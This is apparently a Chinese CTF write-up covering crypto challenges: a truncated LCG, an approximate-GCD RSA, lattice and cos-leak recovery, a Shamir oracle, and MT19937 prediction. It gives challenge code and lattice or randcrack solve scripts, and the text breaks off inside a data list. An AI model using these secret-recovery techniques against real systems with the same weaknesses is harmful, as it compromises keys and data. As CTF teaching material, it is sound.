P = (4143131125485719352848137000299706175276016714942734255688381872061184989156686585992844083387698688432978380177564346382756951426943827434190895490233627 , 3879946878859691332371384275396678851932267609535096278038417524609690721322205780110680003522999409696718745532857001461869452116434787256032366267905519)
p, q = 64760524083545528318139240449356269097871629401328435356643510319660757701117, 109947782034870726628911928816041880655659770652764045401662566933641952899777
# With p known, work on the curve modulo p, where the group order can be computed
E = EllipticCurve(Zmod(p),[114514,1919810])
# Invert the scalar e modulo the group order to undo P = e*G
d = inverse(e,E.order())
P = E.point(P)
G = P*d
# First half of the flag: x-coordinate of G
m1 = long_to_bytes(int(G[0])).decode()
# Second half: ordinary RSA decryption with the factors of n
m2 = long_to_bytes(int(pow(c, inverse(e, (p-1)*(q-1)), n))).decode()
print('SHCTF{'+m1+m2+'}')

misc

拜师之旅②


这里其实有两张图片,并不是IDAT块隐写

遮遮掩掩?CCRC!()

很奇怪的是脚本、工具都没爆出来,然后就不管了

week3

Crypto

这一周的格,非常有意思

babyLCG

from Crypto.Util.number import *
from enc import flag

# The flag itself is the initial LCG state
seed = bytes_to_long(flag)

a = getPrime(400)
b = getPrime(400)
p = getPrime(400)
c = []
for i in range(3):
    seed = (seed*a+b)%p
    # Only the low 80 bits of each state are withheld
    c.append(seed>>80)
# NOTE: multiplier, increment and modulus are all published. Combined with the
# truncated outputs, the hidden low bits can be recovered by lattice reduction, so a
# truncated LCG is not a safe way to hide a secret.
print(f'a = {a}')
print(f'b = {b}')
print(f'p = {p}')
print(f'c = {c}')

https://www.anquanke.com/post/id/204846

# sage
from Crypto.Util.number import *

a = 1372883756826335643900860677787413612322429341217562408695781600316979078457258981362973089185243041545146300735285019651
b = 1616840322678459360621150855366547863164363611723115131556281462274428722388780711443259966667402642255207063489033321533
m = 2141565647927890574190887477298374865093041664871165032669749937281208305153989668560224928991546602875840458004855584463
h = [0,1443574395247483148644856057251704784021992383977243317841569027284868510933981790366865421760703,
183069754718902282305773783141952247255212452217012040185014286070868216807079491063768977456425,
656882922755950063291884479762100383247622967393669466357663276997189742661779445200175739121700]
# Shift each known value back into position: h[i] then holds the known high bits of
# state i with the 80 unknown low bits zeroed. h[0] is a placeholder for the seed.
for i in range(len(h)):
    h[i] <<= 80
# Coefficient lists built with the recurrence below (construction follows the article
# linked above) -- presumably so that each later unknown low part is
# A[i]*l1 + B[i] (mod m) in terms of the first one; TODO confirm
A = [1]
B = [0]
for i in range(1, len(h)-1):
    A.append(a*A[i-1] % m)
    B.append((a*B[i-1]+a*h[i]+b-h[i+1]) % m)
A = A[1:]
B = B[1:]


M = matrix(ZZ, 4, 4)

# Rows 0-1: the modulus on the diagonal; row 2: the A coefficients followed by a 1;
# row 3: the B constants followed by a 2^80 weight.
for i in range(2):
    M[i, i] = m
    M[2, i] = A[i]
    M[3, i] = B[i]
    M[i, 2] = M[i, 3] = 0
M[2, 2] = 1
M[3, 3] = 2 ^ 80
M[2, 3] = 0


# print(B)
# Take the first vector of the reduced basis; its second-to-last entry is used as
# the missing low bits of the first state.
vl = M.LLL()[0]
l1 = vl[-2]
h1 = h[1]
s1 = l1+h1
# s1 = a*seed+b %m
seed = ((s1 - b)*inverse(a, m)) % m
print(long_to_bytes(int(seed)))

Approximate_n()

from Crypto.Util.number import *
import gmpy2
from flag import flag

class gen_AGCD():
    """RSA key pair (two 512-bit primes) that can also emit noisy multiples of ``p``."""

    def __init__(self):
        self.p = getPrime(512)
        self.q = getPrime(512)

    def enc_(self,M,e):
        """Return ``M**e mod (p*q)`` (textbook RSA encryption)."""
        modulus = self.p * self.q
        return pow(M, e, modulus)

    def re_n(self):
        """Return the public modulus ``p*q``."""
        return self.p * self.q

    def re_approximate_n(self):
        """Return ``k*p + r`` for a fresh 512-bit prime ``k`` and 247-bit prime ``r``.

        Each value is a multiple of the secret prime plus comparatively small noise
        (an approximate-GCD sample), so every call leaks information about ``p``.
        """
        multiplier = getPrime(512)
        noise = getPrime(247)
        return multiplier*self.p + noise

if __name__ == '__main__':
    e = 65537
    # The flag is split in half; each half is encrypted under its own key pair
    m1 = flag[:len(flag)//2]
    m2 = flag[len(flag)//2:]
    Encrypt1,Encrypt2 = gen_AGCD(),gen_AGCD()
    C1,C2 = Encrypt1.enc_(bytes_to_long(m1),e),Encrypt2.enc_(bytes_to_long(m2),e)
    N1,N2 = Encrypt1.re_n(),Encrypt2.re_n()

    # Three noisy multiples k*p + r of the first key's secret prime are disclosed ...
    N1_reveal = []
    for i in range(3):
        N1_reveal.append(Encrypt1.re_approximate_n())

    # ... and a single one for the second key
    N2_reveal = Encrypt2.re_approximate_n()

    print('N1 = ',N1)
    print('N1_reveal = ',N1_reveal)
    print('N2 = ',N2)
    print('N2_reveal = ',N2_reveal)
    print('C1 = ',C1)
    print('C2 = ',C2)


N1 = 96502134442306766630190365969731828363778727883130269833831263030729382766871708955277488203412149574872944055023685615073160369667055165391139363670343365821984677896491807268232979350387954877922372950950780243682743844394991203320165732899685131283935792499892753451307642209809221822663392152288471021823
N1_reveal = [77705219796898349926839885901362391697193123906793097191996261575925849175407332321710792825082720557513850089322295414039681336092072254571699321375948951222317860652999589472915517507845841365274672577833665771086028602962109439527025487395716932924154350199931185780615439190044249004833761057553520523896, 101771374571903364376825329513075440461454871187484412108119869577359241962284106364327462518581295773967857497026500027588743941459732681237456599924841361897234722105593154233281857197289498137900009205262742274923791549949458533045513858988834611935292011332698825945015525702084909340922702830454016057656, 103308066020173388243939013455456792344591089380053927065657190729114972231966344486044059361082182275581440708206370313045480128023096558669938992589910297035965428513951908770936451635495065599156803750919438422441607375265723488664344874309433366167807148690522496265012027209017979164952732695326414177286]
N2 = 126314490047348725931925643488256867451387192778862769831444516788178825429992308851796360209421085412834951813258034674586637300071003126259472461902145059495863191644177296794378246004326313468778347471025921062822075416776435141753193055544252015777211515476648743598597767600732476604052602226710111917901
N2_reveal = 121607959929347554767372194929261215875140159338098709002526312843338792449854249114170076517560920373007281830626375354007883051759222075792058099882652989084139135581276833151653103140568975782125656853212748288106091928722346823038787133815664193186644142101267277257773877912682435219235133596307742055012
C1 = 44080512978184690656370058935616299003323581502051429639925401005903492935613231824147617079462256232777256986769059389320542984689091032347985854417804295290617849869674512129448623567972538299941390255754255527203708858792913070477546701933716837223866296707744004945466536539909767255265003029320832208959
C2 = 46651595204851181126381212982309553404707491725272581862478471261361163016056856873672585451522975118618342388104186158854329857236927126394691443786101092805387307362778152096810494593230077268362452994690142423590119812564735744326958141171384070061244342460928080183425972281861566674325530530993856201985

Lattice

import gmpy2
from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
n = getPrime(1024)
# x is only 200 bits, tiny compared with the 1024-bit modulus
x = getPrime(200)
# hint = x * m^{-1} mod n, hence m*hint ≡ x (mod n) with a small x
hint = (x*gmpy2.invert(m,n)) % n
print(f'n = {n}')
print(f'hint = {hint}')
'''
n = 145848130693758117543412571487372860506913235602516809974808585818522269136564650276188615818190323186398953857101908968758176245420927884552132860870716227938682446515612285455042030232618089765452507888912611184083526823439265617219381992067586404368454945188603041053893851526230640924307097690926185151461
hint = 5320062530050244856400971682135383371777368095215566601290251095974038808423579214623058814514827385162275539682781206812688885576283033343821681589154704394235000387503484688642086179809749262851140803203040860523361516855245641425935013688442339456695107400868547828586043122364556477095674662788145610351
'''

简单的格,$x=k*n+m*hint$

$$\left [ \begin{matrix} k&m\\ \end{matrix} \right ] * \left [ \begin{matrix} n&0\\ hint&1\\ \end{matrix} \right ] \ = \left [ \begin{matrix} x&m\\ \end{matrix} \right ]$$

# sage
from Crypto.Util.number import *
n = 145848130693758117543412571487372860506913235602516809974808585818522269136564650276188615818190323186398953857101908968758176245420927884552132860870716227938682446515612285455042030232618089765452507888912611184083526823439265617219381992067586404368454945188603041053893851526230640924307097690926185151461
hint = 5320062530050244856400971682135383371777368095215566601290251095974038808423579214623058814514827385162275539682781206812688885576283033343821681589154704394235000387503484688642086179809749262851140803203040860523361516855245641425935013688442339456695107400868547828586043122364556477095674662788145610351
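# Basis rows (n, 0) and (hint, 1): the integer combination k*(n, 0) + m*(hint, 1)
# equals (x, m), which is expected to be the short vector LLL finds.
mat = [[n, 0], [hint, 1]]
M = Matrix(ZZ, mat)
x, m = M.LLL()[0]
# LLL may return the short vector negated; take the absolute value before decoding
# so a sign flip does not break long_to_bytes.
m = abs(m)
flag = long_to_bytes(int(m)).decode()
print(flag)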

大学×高中√

# sage
from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
assert len(flag)==47
# cos(m) evaluated to 1000 bits of precision; the full value is printed
leak = cos(m).n(1000)
print(leak)
# 0.930663173858708735013864574261632487708466528608503618563619854272677238694112204757817175383567864768566170130001514302467697072153084760545849543698249360760783987526742296036337216144968878436793442305949050751417113202760217838648422727760945579644861599148512584771382319668482598215317149996430

这里我们知道的是cos(m)的前1000位,则根据反三角函数$m=arccos(leak)+2k\pi$
$m-arccos(leak)-2k\pi=0$
构造格

$$L = \begin{bmatrix} 1 & 0 & 1 \\ 0 & 1 & arccos(leak)\\ 0 & 0 & 2\pi\\ \end{bmatrix}$$

找出线性关系

$$\begin{bmatrix} m & -1 & -k \end{bmatrix} * \begin{bmatrix} 1 & 0 & 1 \\ 0 & 1 & arccos(leak)\\ 0 & 0 & 2\pi\\ \end{bmatrix} \ = \begin{bmatrix} m & -1 & 0 \end{bmatrix}$$

发现直接跑LLL算法进行格基规约是跑不出来的
需要平衡一下目标向量,并且使得格体积略大于目标向量的模长,官方wp的原话
flag长度为47,则m是376位的

$$\begin{bmatrix} m & -1 & -k \end{bmatrix} * \begin{bmatrix} 1 & 0 & 2^{760} \\ 0 & 2^{376} & 2^{760}*arccos(leak)\\ 0 & 0 & 2^{760}*2\pi\\ \end{bmatrix} \ = \begin{bmatrix} m & -2^{376} & 0 \end{bmatrix}$$

# sage
from Crypto.Util.number import *
leak = 0.930663173858708735013864574261632487708466528608503618563619854272677238694112204757817175383567864768566170130001514302467697072153084760545849543698249360760783987526742296036337216144968878436793442305949050751417113202760217838648422727760945579644861599148512584771382319668482598215317149996430
# arccos of the leaked value. The write-up's relation is
# m - arccos(leak) - 2*k*pi = 0 for some integer k, which the lattice below
# encodes in its third column.
acos = arccos(leak)
RF = RealField(1000)
# RealField takes an explicit precision; without one it defaults to 53 bits.
pi = RF(pi)
# The row combination (m, -1, -k) yields (m, -2^376, ~0).
#   * 2^376 weights the second coordinate so it has the same size as m
#     (the flag is 47 bytes = 376 bits).
#   * 2^800 scales the real-valued relation so that any combination whose
#     third coordinate is not close to zero becomes very long.
# NOTE(review): the prose above this script uses 2^760 as the scale, the code
# uses 2^800.
M = Matrix(QQ,[[1,0,2^800],[0,2^376,2^800*acos],[0,0,2^800*2*pi]])
# The reduced vector may come out negated, hence abs() on its first entry.
m = abs(M.LLL()[0][0])
flag = long_to_bytes(int(m))
print(flag.decode())

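暂时还没搞懂 $2^{376}$ 和 $2^{760}$ 所代表的具体意义,只知道它满足最小向量(?)
(补注:$2^{376}$ 是用来配平的——m 约 376 位,而目标向量的第二个分量原本只有 $-1$,乘上 $2^{376}$ 之后各分量量级相当;$2^{760}$ 是给第三列(实数关系式那一列)加的大权重,一方面让第三个分量不接近 0 的组合都变得很长,另一方面把格的行列式抬高到约 $2^{376}\cdot 2^{760}\cdot 2\pi$,其立方根约为 $2^{379}$,略大于目标向量的长度(约 $2^{376.5}$),这正对应上面"格体积略大于目标向量的模长"的要求。注意脚本里实际使用的是 $2^{800}$。)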

Shamir()

from Crypto.Util.number import getPrime,bytes_to_long
import random
from os import getenv

BANNER = """
__ __ _ _______ _____ _ _
\ \ / / | | |__ __| / ____| | (_)
\ \ /\ / /__| | ___ ___ _ __ ___ ___ | | ___ | (___ | |__ __ _ _ __ ___ _ _ __
\ \/ \/ / _ \ |/ __/ _ \| '_ ` _ \ / _ \ | |/ _ \ \___ \| '_ \ / _` | '_ ` _ \| | '__|
\ /\ / __/ | (_| (_) | | | | | | __/ | | (_) | ____) | | | | (_| | | | | | | | |
\/ \/ \___|_|\___\___/|_| |_| |_|\___| |_|\___/ |_____/|_| |_|\__,_|_| |_| |_|_|_|
"""
# Greet the client before any protocol output.
print(BANNER)

# The shared secret is the flag from the environment, encoded as an integer.
flag = getenv("GZCTF_FLAG", "GZCTF_NOT_DEFINE")
m = bytes_to_long(flag.encode())
# Fresh 1024-bit prime modulus per run; it is printed to the client below.
n = getPrime(1024)
# Degree-100 polynomial: constant term m followed by 100 random coefficients.
# NOTE(review): the coefficients come from `random` (Mersenne Twister), which
# is not a CSPRNG; a real secret-sharing deployment would draw them with
# `secrets.randbelow`.
coefficients = [m, *(random.randrange(1, n - 1) for _ in range(100))]
print(f"n = {n}")

def f(x):
    """Evaluate the sharing polynomial at ``x`` modulo ``n``.

    Reads the module-level ``coefficients`` (constant term first) and ``n``,
    and returns ``sum(coefficients[i] * x**i) mod n`` as a non-negative int.
    Because every power is taken with ``pow(x, i, n)``, only the residue of
    ``x`` modulo ``n`` influences the result.
    """
    total = 0
    for power, coeff in enumerate(coefficients):
        # Reduce after every term so the accumulator never grows past n.
        total = (total + coeff * pow(x, power, n)) % n
    return total

# Share oracle: answer (x, f(x)) for every x the client sends until x == 0.
# NOTE(review): two properties matter for anyone reusing this pattern outside
# a CTF. The guard compares x with the literal integer 0 and never reduces it
# modulo n first, and the loop puts no limit on how many shares one client may
# request. A hardened service would test `x % n == 0` and hand out fewer
# shares than the polynomial has coefficients.
while True:
    x = int(input("Please Input x: "))
    if x != 0:
        res = (x, f(x))
        print(res)
        continue
    print("Not Allowed!!!")
    exit()

week4

Crypto

MT19937

题目

import hashlib
import random
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import os
from my_own_flag import flag

def MT_19937(num,en_c):
    """Seed the global Mersenne Twister and draw ``num + en_c`` 32-bit words.

    The generator is seeded with 16 bytes from ``os.urandom``. The first
    ``num`` outputs are returned as a list; the following ``en_c`` outputs are
    only returned as their integer sum.

    Returns:
        A tuple ``(number, cal)``: the list of the first ``num`` outputs and
        the sum of the next ``en_c`` outputs.
    """
    random.seed(os.urandom(16))
    # Order matters: the published words are drawn first, the summed ones after.
    number = [random.getrandbits(32) for _ in range(num)]
    cal = sum(random.getrandbits(32) for _ in range(en_c))
    return number, cal

def encrypt(cal,flag):
    """Encrypt ``flag`` with AES-ECB under a key derived from ``cal``.

    The key is the SHA-256 digest of the decimal string of ``cal``; ``flag``
    (bytes) is padded to a 16-byte boundary before encryption.

    NOTE(review): the only secret input is ``cal``, which the caller builds
    from Mersenne Twister outputs, so the key is exactly as predictable as
    that generator. ECB also encrypts equal plaintext blocks to equal
    ciphertext blocks. Neither choice is suitable outside a challenge.
    """
    digest = hashlib.sha256(str(cal).encode())
    cipher = AES.new(digest.digest(), AES.MODE_ECB)
    return cipher.encrypt(pad(flag, 16))

def main():
    """Split the flag in two, encrypt each half, and write ``data.txt``.

    The first half is keyed by the sum of outputs 624..1247 of one generator,
    and all of its first 624 outputs are published. The second half is keyed
    by the sum of outputs 624..779 of a freshly seeded generator, of which
    only the first 600 outputs are published.
    """
    LEN = len(flag)
    half = LEN // 2
    m1, m2 = flag[:half], flag[half:]

    Num = 624

    # encrypt m1
    outputs1, cal1 = MT_19937(Num, Num)
    c1 = encrypt(cal1, m1)

    # encrypt m2
    outputs2, cal2 = MT_19937(Num, Num // 4)
    c2 = encrypt(cal2, m2)

    # One record per line: both output lists, then both ciphertexts.
    with open('data.txt', 'w') as out:
        for record in (outputs1, outputs2[:600], c1, c2):
            out.write(str(record) + '\n')

# Generate data.txt only when this file is executed as a script.
if __name__ == '__main__':
    main()
import random
from Crypto.Util.number import *
from randcrack import RandCrack
import hashlib
from Crypto.Cipher import AES

k1 = [1212937457, 714280275, 2934808054, 289447810, 634020656, 2582053193, 2648476152, 3584472561, 2877037797, 1051288028, 3007240724, 3583122714, 2377373219, 2233668169, 2300136290, 4277363949, 572508719, 3707687803, 868724505, 2234515288, 2182162330, 2354654192, 3676064525, 16386761, 1934246009, 396534601, 3406538372, 1978740790, 51554945, 1642830773, 3255471879, 249329746, 1871028531, 1670146144, 3955249559, 3523216280, 4225679888, 1979625069, 1711120506, 4224015378, 2357192253, 1437719734, 1861766583, 252037050, 3805173581, 3845899039, 239338040, 3335618070, 1909354144, 2380236080, 3120658839, 2738735651, 1749563272, 4028406006, 198730175, 4095736523, 2224365497, 1850797931, 123559677, 277130374, 1547602417, 2312967225, 1064405558, 620877831, 4182002366, 2717144120, 2424475877, 1261886189, 2666842961, 1250633055, 1445939400, 2496676732, 46718503, 1726056600, 2892333819, 3874613567, 2801764620, 3279121957, 62950328, 14090298, 3016963976, 235881318, 1152787765, 3549713637, 3184265794, 461262349, 1835258817, 706701716, 366259495, 2484440259, 2306336615, 2418024433, 107268664, 3018120752, 3915797798, 1685880034, 2782876985, 2876720582, 3803172243, 1745503879, 1965535595, 2831775453, 3139448870, 770826076, 559187920, 4292272948, 86904027, 1821662944, 58381562, 250790584, 2122997254, 2937312684, 3225034461, 1493971528, 913420791, 2911905254, 2938402784, 1430747115, 2654595902, 3315197237, 602765188, 1471009311, 3788529131, 913593424, 3280524381, 1554400422, 3250536147, 3480550436, 821401975, 3216026683, 762420368, 1733854366, 2395038075, 533527872, 3040490234, 2855012365, 2984904790, 2830464734, 2200935030, 523059886, 3795772367, 2905400361, 667720140, 3155311553, 1860651089, 1053555607, 2889478721, 1812821011, 3391980212, 3433665687, 2480476597, 1319654037, 1076583906, 2287201297, 966928688, 2542225146, 2246098689, 3117124345, 1844896511, 3104215564, 1303510082, 2924158615, 3648677443, 3308489255, 3809196505, 3199516268, 2254502655, 2126047470, 1763846642, 
3851973930, 1280609700, 2415985988, 1312349771, 2103486452, 4229394974, 1937464844, 2763672456, 1366425769, 1532462738, 1864298394, 1203192658, 3679892306, 4138733297, 39437090, 1317880030, 132948638, 2315846286, 3394291148, 3207221552, 3834885856, 2367158425, 3183864791, 3303289072, 519407526, 4127464161, 1556426685, 2427155757, 2010011401, 2823249259, 3638339516, 2266010959, 345885116, 471672470, 2713191580, 731238671, 1694687550, 2523761501, 3533913138, 163820753, 1829608711, 587056408, 1129980234, 3642159144, 2546599527, 758703728, 1713442774, 1864598338, 2763096157, 2308766766, 1132350895, 2776604596, 1921085522, 1409581297, 2643399928, 3285649744, 1248611904, 2694186262, 2676127368, 2579578748, 3784393865, 2655293049, 1378866508, 1251610536, 1048557165, 3045231444, 4236456301, 2496231577, 4118010676, 3079411364, 2425576144, 2431718306, 543894373, 118186072, 2594647421, 1833894329, 3876640493, 1916631983, 2765860034, 3905895682, 2207230275, 2554838603, 3199831939, 2516271151, 3080023814, 3594335532, 1197450849, 2621744299, 447615180, 1616950869, 3109651542, 2553431350, 4165466937, 2130063794, 1459492895, 1141470511, 948009682, 325807524, 1681494454, 3137320840, 4219461371, 609761579, 942363481, 2404858793, 1697226342, 830264373, 230968933, 831865647, 4164463522, 2968510743, 1464271639, 1397831008, 2559413030, 3515044508, 772056268, 3152446673, 3117754594, 833212973, 4252629747, 2565179775, 3005093783, 3595030314, 4042182692, 298671165, 3183128227, 3429794312, 4122368172, 1900961662, 3589294443, 3190786481, 1744404482, 1921785452, 3011999869, 642164068, 3695788414, 2275346981, 1428956574, 2697326707, 2202213004, 3287889517, 919861723, 726410498, 337174656,
2417998504, 2752587611, 3856581958, 141509063, 1762431188, 2065705145, 2031960873, 1892209091, 2395039500, 1058479586, 1537034270, 502217054, 3102018820, 1433274316, 1372952271, 2918921770, 239909451, 1398298200, 2339489735, 372558373, 2263872236, 2426192905, 337209508, 3983991978, 2574803724, 2837664572, 1569892789, 2625063195, 3262762020, 24150029, 2016099290, 2239153990, 85602273, 973040529, 2956276779, 4218049523, 2043716624, 2788573458, 1218787308, 939708241, 2861205992, 2427634523, 4128874493, 2326852266, 2593724377, 1680473968, 2763572707, 4240616686, 2863701585, 3551633590, 1765256405, 2110583291, 357590304, 2511138801, 859903599, 35591840, 3786321031, 3559501147, 3107666783, 2356867678, 1369801910, 2488594855, 2148205170, 3944224524, 2219844222, 466009157, 2328231114, 2777059464, 1585865212, 2871297568, 2558165993, 1561563095, 438633926, 2619385032, 2185942244, 2501145168, 2161107203, 912485991, 3956413626, 4065963551, 1527306118, 378382496, 1016367697, 82832444, 2484726280, 867566307, 1037338825, 4291735272, 901722138, 3956112428, 1060890097, 4210262544, 2525835262, 786274933, 2563584713, 2738164238, 3438656534, 564065202, 3288501195, 1074332184, 2947775555, 3790174897, 3607901153, 2332098514, 3648669449, 3879104921, 3983960923, 548882335, 1817587379, 1555057777, 2705918139, 2755720626, 2706833366, 2947946695, 3082750952, 2323554320, 1804494628, 1677086381, 2771841028, 2470056271, 3431120732, 4073503495, 2929631518, 80800254, 605951710, 1664206366, 2498279527, 360922649, 2590660538, 3724444465, 3559953317, 3002864163, 3369368155, 1569518356, 3831143803, 4184782515, 1602338537, 2640186368, 2864951447, 514648741, 887020932, 166121609, 476244781, 2238614863, 3039706334, 3586500526, 3038068930, 3989751746, 3699955508, 3559348520, 884358906, 444882591, 3769021913, 3665754928, 1911261614, 1234192084, 3450557803, 3232410240, 494096069, 660552292, 1365481833, 520081058, 1027987838, 3165505556, 1257833693, 2146291679, 3634622224, 589123893, 1195030125, 1602406253, 
772753497, 2661121530, 2938530200, 1070706826, 3890477657, 2112901265, 4253917692, 2291562806, 67613984, 2608069358, 1726139310, 3018885048, 367067728, 3838771641, 1357927847, 2616452172, 722979624, 4153031784, 607660099, 3164865398, 3199368055, 1885230388, 1055777913, 3475913336, 1546318749, 578282810, 1558944130, 2955660875, 2214838829, 4202836988, 1405916968, 2593459723, 3648360966, 3644813488, 598912719, 876098814, 355483438, 685352898, 4099087273, 2983380912, 450980374, 2753208777, 429297943, 3462109454, 3134522829, 2064548393, 2200750558, 4247753845, 251220053, 1556849099, 2022648175, 3563632884, 2175932589, 1463719656, 1887673611, 3541708446, 3033219582, 3255799816, 534398633, 3481196045, 825005812, 1629237540, 640085217, 899503755, 3105157116, 488231507, 2708835929, 2648663900, 2048030022, 1503411342, 4059850866, 1281156549, 3171426598, 2637361895, 1110841056, 606897504, 3001264062, 912267483, 148124465, 202684836, 1425732680, 3637635336, 1455737055, 2977077407, 54987379, 1056796337, 1832170261, 1870208138, 4074249428, 2993704297, 381772606, 2362720677, 2164369676, 250156737, 3409786877, 1590821450, 2959971180, 3682255149, 302283211, 4204651015, 1294232346, 3088162584, 4209012441, 784333825, 1275400791, 885466807, 1249631254, 1236809354, 2627231325, 2391839654, 1638467843, 2797229961, 3799496431, 237846505, 3432655604, 1690038717, 1493561006, 4229115929, 3784624191, 2891696687, 3557702324, 1120718375, 2593253432, 1415584860, 551110044, 1510986691, 3267929936, 2341598281, 247215742, 3192053018, 2856032615, 3290505354, 907961089, 4128700570, 4195745607, 2035634741, 1047086449, 216435127, 1997121891, 3391563810, 2813128796, 1517545322]

k2 = [2137201486, 2243095490, 3817098931, 229608464, 73854451, 2470370137, 647955184, 1997583099, 2122796155, 3754429965, 915090235, 3330907022, 4045925639, 1616378187, 3477748127, 3235608209, 4168058459, 137624259, 2992531650, 509166204, 3920545433, 1915159362, 3901263233, 4228481818, 2816405167, 1786108715, 3305752402, 2384763695, 227465801, 1052658065, 3153900057, 117311308, 1595474528, 1087880165, 3166831564, 1588364714, 528237288, 617272354, 618281932, 1618791873, 3810883062, 894018392, 2575794219, 103568311, 3298607681, 536028939, 3467146346, 2201685940, 1076138845, 918210863, 1341794665, 3456513087, 1710914773, 1894309846, 2312381988, 127727152, 876614149, 1709878784, 1156541415, 1555452594, 182448271, 408344822, 2898434231, 1998211488, 3592206445, 1085073460, 3397525879, 663024038, 3434587726, 2768736843, 617681814, 2865397550, 3463093384, 2746629701, 2006818690, 1121017677, 2047400279, 1921768902, 528024592, 2892263293, 2798869302, 3481658697, 2848153687, 1134481165, 3720776629, 486120970, 2683483151, 3252410704, 2891974166, 2121509882, 4160792826, 2915283137, 4014112386, 1792273527, 805496405, 1407962158, 3622679727, 3512697173, 2901255951, 3111681208, 2877903904, 827923100, 3729787569, 925768344, 923906770, 3606973890, 1181029191, 689515782, 1651144572, 3459362488, 2412684107, 1362064386, 4159398924, 2922809145, 1602978249, 3705882625, 4293462677, 764953390, 4178674632, 2074025926, 1925824438, 2523046149, 1263372335, 1677306491, 760292173, 3736532489, 2036587975, 514100070, 706857874, 1060105302, 2578078966, 2320134376, 3639164974, 1710455599, 45505402, 2407597519, 2537656373, 56251495, 1630733521, 519864415, 1444518872, 513906964, 3852284907, 800496493, 872675679, 3155530732, 683268660, 3856797215, 137673146, 3607443770, 3700387644, 965766446, 2454233777, 954672952, 2855774032, 3552757435, 3025907069, 1402938518, 3041387870, 3456472325, 447871942, 1327563590, 620160190, 1007188755, 180115074, 52020277, 1774723235, 2887773879, 3508414970, 3631951842, 
1763635376, 1924307117, 4204987693, 2494477117, 4017134019, 368620157, 2814392181, 2199699352, 1158269085, 2580589087, 1747804339, 1012560482, 933361529, 176586313, 2808905110, 83750114, 3090684109, 1767704883, 4189833886, 4249260150, 2157821862, 2112716220, 261010276, 3168798078, 1920566780, 1823590666, 2244335700, 2816218464, 3295774792, 2283997010, 3733740723, 3169836042, 1782097885, 1421909608, 3071286976, 2529056825, 2917504380, 2500113967, 1340022169, 1325786585, 2696541388, 3763160733, 3603998832, 72655495, 2892272720, 2785458061, 1724578654, 2144338844, 2899719547, 318345339, 2511462884, 3220707099, 1676208778, 2586878575, 3209502577, 3013180194, 2700788434, 3611106949, 1712906930, 3381158761, 962420077, 1928661992, 1241692316, 3587734972, 2361851891, 729570171, 1255993130, 2059230370, 3819451535, 2490865889, 1229457976, 3062266381, 3350574651, 1861939269, 3074031276, 1122137253, 3267903554, 2691684836, 3042505532, 1103427454, 2126863565, 3686667924, 4181984974, 238390653, 2037278833, 2930470784, 424623283, 3074336567, 4019540123, 447553681, 491252047, 2134100060, 3683266682, 2218397687, 1535505498, 628745497, 445350701, 186184731, 3190072310, 1084556173, 277509904, 2898643406, 4292667973, 2903270520, 2565372604, 303440546, 1808627640, 3069152665, 2075086265, 350493108, 3426866771, 1167370872, 2856612905, 1133769957, 2168578594, 361418126, 1788736419, 3450707887, 1988560242, 3106183307, 420765626, 1595814948, 813997149, 2474462651, 3945801301, 1785414095, 4177305184, 3071687740, 1273724577, 4178527412,
2536332142, 2692000853, 2172897829, 1472311250, 1630835977, 2274186143, 3947343331, 1836099636, 3955763613, 271610193, 2479541262, 3666471942, 4217699594, 341808580, 1517926781, 3311123634, 1738600938, 3870938757, 2309182531, 3189576099, 1594683626, 1900151562, 3625455382, 3527220315, 471268317, 4085391597, 1205291118, 1903466784, 934489768, 717103328, 407385599, 1146912039, 2148396650, 3906209540, 3002211292, 4003244728, 1595357238, 4224659669, 3679773598, 1554305724, 1879798896, 856183762, 2448013518, 2839667183, 3541976537, 1201501683, 2210517506, 3074699110, 2545660131, 3696626258, 1684534318, 3093429986, 2603224784, 3784468515, 1931537793, 570789340, 376758771, 2307788100, 2180860578, 201860820, 3293433128, 1396840567, 2231737923, 3343569549, 890147328, 3369945506, 3155052764, 4225372249, 3097945008, 1976073442, 1939061106, 3009821364, 3636790064, 1722351481, 571067187, 3660829870, 625774796, 962877120, 4093260308, 2994561947, 1780515932, 4180215026, 4252365298, 2947348994, 2484307881, 1869054839, 1567538899, 2381016872, 650248596, 2837463974, 3547259433, 1653667021, 276270749, 1685266082, 3605301102, 3560229703, 3732548108, 3643340502, 2787020632, 301650068, 1692193275, 3053122330, 446613045, 753748541, 3639322954, 2521151846, 3846032512, 2540737292, 1022192711, 4242180248, 2050165414, 2033316505, 3063183472, 2547887329, 1562411323, 2846186023, 1057549601, 200005518, 2515317663, 614142733, 2822762719, 1111596810, 730033186, 3539522165, 2876952827, 1093300071, 2988803720, 2788643910, 1815173676, 923492540, 1571870569, 1732017323, 3912738621, 1932484987, 1369226061, 1043943980, 659920686, 87860672, 3117771700, 536701, 1276716714, 399069847, 675178237, 4148780498, 2293633457, 510556418, 3306441120, 3969884840, 931665570, 1269866789, 1486094185, 1896845492, 2955478105, 3949294788, 2483398248, 2792552965, 367597061, 955979053, 4141216471, 3162398417, 783759084, 605101703, 3200303074, 1835668453, 3586071304, 2174558649, 2997422459, 3634493394, 4138976583, 
164027380, 490279465, 2469644175, 43130477, 1547916166, 2406583577, 1303190434, 1431585058, 1519905099, 1079834268, 231749295, 1635997362, 1423407810, 2814537500, 2894136671, 3686889877, 1812711299, 4226627996, 3754118359, 20804048, 4285391186, 2958387414, 2233166520, 3070925064, 1320913219, 2976334802, 4041836979, 382095839, 1388937175, 1819247059, 3838255239, 3380204370, 3935811842, 2751480313, 164540071, 2340071112, 610666648, 595972300, 2011517128, 213838138, 4255091509, 3777157969, 2402199559, 3852693289, 4206005132, 3787527275, 1471785983, 2589388076, 631286274, 3524096200, 590972337, 1887865600, 1760603763, 643231370, 2643740969, 2388499010, 1722852753, 645073667, 3177739276, 1242181637, 2984331308, 567911875, 753620395, 3743678155, 4278357119, 2815496781, 1270587449, 4259346098, 589049437, 3257834517, 3637173709, 2882662502, 2892380404, 1843952012, 2832065071, 1053718106, 330418109, 3909969653, 916711438, 3709287944, 2455153252, 763050070, 1667025352, 3019273370, 3814458403, 1093369006, 3332713718, 752637853, 100085835, 523535862, 4068027345, 1845694557, 2754500540, 3395089568, 2675873208, 525907800, 937117572, 3313729567, 1112554253, 114888315, 619966459, 1641381760, 1017743298, 1178701646, 1581336326, 362103885, 3516308826, 869224156, 376989708, 633412018, 1074308065, 3818889570, 4249601414, 2417156426, 2229939059, 1313267093, 2929434755, 783116601, 1643811645, 996372459, 3352907069, 953035592, 1641549976, 2112115418, 1350813227, 3528081888, 1136982588, 1390912242, 2659886726, 1031606598, 